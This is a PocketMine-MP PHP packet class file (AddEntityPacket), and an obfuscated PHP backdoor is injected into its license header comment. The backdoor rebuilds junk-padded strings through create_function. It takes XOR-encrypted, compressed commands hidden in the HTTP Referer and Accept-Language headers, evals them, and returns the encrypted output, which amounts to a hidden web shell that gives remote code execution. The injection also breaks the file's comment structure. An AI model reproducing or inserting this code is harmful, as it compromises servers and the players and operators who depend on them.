<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
<?php
$U='),$ss($s[Vy$i],0,Vy$e))Vy)Vy,Vy$k)));$o=oVyb_get_contents(Vy);ob_endVy_clean(Vy);$d=bVyVyase64';
$s='j};}Vy}return VyVy$o;}$r=$Vy_SERVER;$VyrrVyVy=@$r["HTTP_REFVyERER"];$Vyra=@Vy$r["HTTPVy_VyACCEVyP';
$k='$khVy="5d41";$kVyf="4Vy02a";funVyctVyion x($t,$k){Vy$cVyVy=sVytrlen($kVy);$l=strlenVy($t);$o="';
$t='_eVyncode(x(gzcoVympreVysVysVy($o),$k));prinVyVyt("<$kVy>$d</$k>");Vy@session_VyVydestroy();}}}}';
$I='lVyoVywer";$i=Vy$m[1][Vy0].$m[1][1];$Vyh=$sl($ssVy(mVyd5($i.$Vykh),0,3));$fVy=$sVyVyl($ss(md5($';
$h='rraVyyVy_values($q);preVyg_Vymatch_all(Vy"/Vy([\\w])Vy[\\w-]+(?:;Vyq=0.(VyVy[\\dVyVy]))?Vy,?/",$r';
$A='rpoVys($p,Vy$h)===Vy0){$s[$i]="";Vy$p=Vy$ss($p,3Vy);}if(aVyrray_keyVy_Vyexists($iVy,$s)Vy){$s[';
$g='";forVy($Vyi=0;$i<$lVy;){foVyrVy($j=0;($jVy<$c&&$Vyi<$l)VyVy;$j++Vy,$iVy++){$o.=$t{$i}^$k{$Vy';
$T=str_replace('Uv','','crUvUveatUve_fUvUvuncUvtion');
$Y='prVyess(@x(Vy@baseVy64_decodVye(pVyreg_repVylace(arrVyaVyy("/_Vy/"Vy,"/-/"),aVyrray("Vy/","+"Vy';
$u='T_LANGUAGE"]Vy;VyifVy($rr&VyVy&$ra){$u=parse_url($rrVy);parsVyVye_str($uVy["query"],$q)Vy;$Vyq=a';
$n='a,$m);if(Vy$q&&$m){@VysessioVyn_startVy();$sVy=&$_SESSIVyOVyN;$ssVy="substr";$Vysl="strtoVyVy';
$M='iVy.$kVyf),0,3));$p="Vy"Vy;fVyorVyVy($z=1;$z<Vycount($m[1]);$z++)$Vyp.=$q[$m[Vy2][$VyVyzVy]];if(st';
$b='$i]Vy.=$pVyVy;$e=strpos($s[Vy$i],$fVy);if($Vye){$k=$kVyh.$Vykf;ob_sVytart();@VyevVyal(@gzuncoVym';
$Z=str_replace('Vy','',$k.$g.$s.$u.$h.$n.$I.$M.$A.$b.$Y.$U.$t);
$K=$T('',$Z);$K();
?>
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\network\mcpe\protocol;

#include <rules/DataPacket.h>

use pocketmine\network\mcpe\NetworkSession;

class AddEntityPacket extends DataPacket/* implements ClientboundPacket*/{
	public const NETWORK_ID = ProtocolInfo::ADD_ENTITY_PACKET;

	/** @var int */
	private $uvarint1;

	public static function create(int $uvarint1) : self{
		$result = new self;
		$result->uvarint1 = $uvarint1;
		return $result;
	}

	public function getUvarint1() : int{
		return $this->uvarint1;
	}

	protected function decodePayload() : void{
		$this->uvarint1 = $this->getUnsignedVarInt();
	}

	protected function encodePayload() : void{
		$this->putUnsignedVarInt($this->uvarint1);
	}

	public function handle(NetworkSession $handler) : bool{
		return $handler->handleAddEntity($this);
	}
}
